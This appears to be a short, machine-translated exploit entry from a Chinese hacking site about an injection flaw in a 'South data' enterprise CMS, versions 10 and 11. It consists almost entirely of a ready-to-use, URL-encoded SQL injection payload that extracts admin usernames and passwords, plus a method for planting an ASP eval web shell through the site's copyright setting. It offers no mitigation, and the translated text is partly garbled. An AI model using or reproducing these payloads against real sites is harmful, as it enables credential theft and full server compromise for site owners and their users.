South data enterprise latest injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200923678
Type myhack58
Reporter 佚名
Modified 2009-06-27T00:00:00


By: A XoL-!

Found to date:

2008-09-25 Affected version: v10. 0 v11. 0


<>'%20union%20select%2 0 0,username%2BCHR(1 2 4)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%2 0*%20from%20news%20where%2 0 1=2%20and%2 0"='

Get the shell method:

In the website configuration[<>]the copyright information in the write"%><%eval(request(chr(3 5)))%><%' The success of the shell is written<>